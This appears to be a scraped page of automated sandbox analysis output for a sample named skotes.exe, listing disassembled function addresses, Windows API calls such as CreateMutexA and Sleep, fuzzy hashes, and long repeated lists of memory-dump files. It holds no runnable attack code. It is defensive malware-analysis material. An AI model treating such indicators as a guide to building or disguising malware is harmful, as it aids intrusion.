Associated: 00000001.00000002.1726857921.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726938598.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726960603.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726975160.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: vC
API String ID: 3213747228-1921080006
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: 8cae4ceb00b15cc6f8fe4719d8afecb37dc1afbf88934ae700027118ad1b5c75
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: DEB1F3329046459FEB15CF28C8C27AEBBA5EF49344F24916BE855FB341D6389D02CB68

Function 00402EC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00402F5F
__Mtx_unlock.LIBCPMT ref: 00402FCC
__Mtx_unlock.LIBCPMT ref: 004030F5
__Mtx_unlock.LIBCPMT ref: 0040319B

Memory Dump Source

Source File: 00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1723487807.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1723598147.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1724503619.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725120350.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725143023.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725157550.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725171911.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725536980.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725597156.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725668295.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725683350.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725696951.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725710984.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725731210.000000000061A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725744558.000000000061B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725771303.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725789629.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725827766.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725852525.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725879202.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725896770.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725915563.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725930463.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725949147.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725971536.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725990755.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726005323.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726023306.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726043538.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726056594.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726074827.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726148456.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726204549.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726220346.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726240833.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726599148.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726620865.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726640335.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726696204.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726724454.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726744953.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726814635.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726857921.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726938598.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726960603.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726975160.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID:
API String ID: 1418687624-0
Opcode ID: 7a31e774ce5160496b868481ad1714a18b6c01a7f89619dc1ccf0676da36917e
Instruction ID: 2ceb4b633ad4a171d295bd911596fac7f10c239a595cf67c3a826b401b9ecef4
Opcode Fuzzy Hash: 7a31e774ce5160496b868481ad1714a18b6c01a7f89619dc1ccf0676da36917e
Instruction Fuzzy Hash: 9EA10170A01205AFDB10DF65C94579BBBA8FF18315F00817BE815EB381EB39EA44CB99

Function 0043F35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043F3A3

Strings

`'F, xrefs: 0043F375
8"F, xrefs: 0043F44B

Memory Dump Source

Source File: 00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1723487807.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1723598147.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1724503619.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725120350.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725143023.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725157550.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725171911.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725536980.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725597156.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725668295.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725683350.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725696951.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725710984.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725731210.000000000061A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725744558.000000000061B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725771303.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725789629.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725827766.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725852525.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725879202.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725896770.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725915563.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725930463.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725949147.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725971536.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725990755.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726005323.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726023306.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726043538.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726056594.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726074827.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726148456.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726204549.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726220346.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726240833.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726599148.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726620865.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726640335.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726696204.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726724454.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726744953.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726814635.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726857921.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726938598.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726960603.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726975160.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"F$`'F
API String ID: 3903695350-3117062166
Opcode ID: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
Instruction ID: 543839021cf0bf63342fab8d7291383f9c2b30be018e8c543b9015e977d3828c
Opcode Fuzzy Hash: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
Instruction Fuzzy Hash: 0C31A232A00201DFEB206A3AD845B5B73E6EF18315F10642FE485D7691DF78EC94CB19

Analysis Process: skotes.exePID: 4948, Parent PID: 2124COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	621
Total number of Limit Nodes:	4

Executed Functions

Function 0043652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,0043652A,?,?,?,?,?,00437661), ref: 00436566

Memory Dump Source

Source File: 00000002.00000002.1725120776.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724491178.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725120776.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725203580.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725248583.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725272248.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725523316.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725547727.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725781712.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725836564.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725928954.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725946786.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725982656.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726004166.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726035071.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726055406.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726072537.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726200814.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726231451.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726605042.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726622267.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726641293.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726664742.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726684868.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726704464.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726735071.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726786091.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726908663.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726951137.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726972455.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726995494.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727015082.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727039128.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727061783.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727086829.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727107469.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727127584.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727196829.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727215731.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727239300.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727264025.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727284217.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727299523.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727319522.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727340897.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 403dd8cb53c2cad25e0182682553b68544cb3583c073d72be98fe1c5d720cad1
Instruction ID: 855451016502e0673b215f114f63da87a9bf440fe4c43495d1d7c3c9990ac601
Opcode Fuzzy Hash: 403dd8cb53c2cad25e0182682553b68544cb3583c073d72be98fe1c5d720cad1
Instruction Fuzzy Hash: 5AE086300411087EDF357F58DC05D493B6AEF55784F016826F90546225CB6DED42CA44

Function 00409BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000002.00000002.1725120776.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724491178.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725120776.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725203580.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725248583.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725272248.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725523316.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725547727.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725781712.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725836564.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725928954.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725946786.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725982656.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726004166.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726035071.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726055406.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726072537.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726200814.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726231451.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726605042.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726622267.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726641293.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726664742.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726684868.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726704464.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726735071.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726786091.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726908663.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726951137.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726972455.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726995494.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727015082.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727039128.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727061783.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727086829.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727107469.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727127584.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727196829.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727215731.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727239300.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727264025.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727284217.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727299523.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727319522.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727340897.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: 3c046bd20ebb86cd43c96a7fd8deb3fdb0bdf8de41550d19e43556debd415393
Instruction ID: 06aeb3b2356e13ba2ba348e507c83f9390eae3a05fe6ca88f15e1e5240625ece
Opcode Fuzzy Hash: 3c046bd20ebb86cd43c96a7fd8deb3fdb0bdf8de41550d19e43556debd415393
Instruction Fuzzy Hash: 96314C71B042008BFB08DB78DD8975EBB72ABC6324F20862AE014A73D6CB7D59818759

Function 00409F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000002.00000002.1725120776.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724491178.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725120776.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725203580.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725248583.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725272248.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725523316.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725547727.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725781712.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725836564.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725928954.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725946786.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725982656.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726004166.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726035071.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726055406.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726072537.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726200814.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726231451.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726605042.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726622267.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726641293.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726664742.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726684868.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726704464.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726735071.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726786091.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726908663.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726951137.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726972455.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726995494.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727015082.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727039128.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727061783.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727086829.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727107469.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727127584.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727196829.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727215731.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
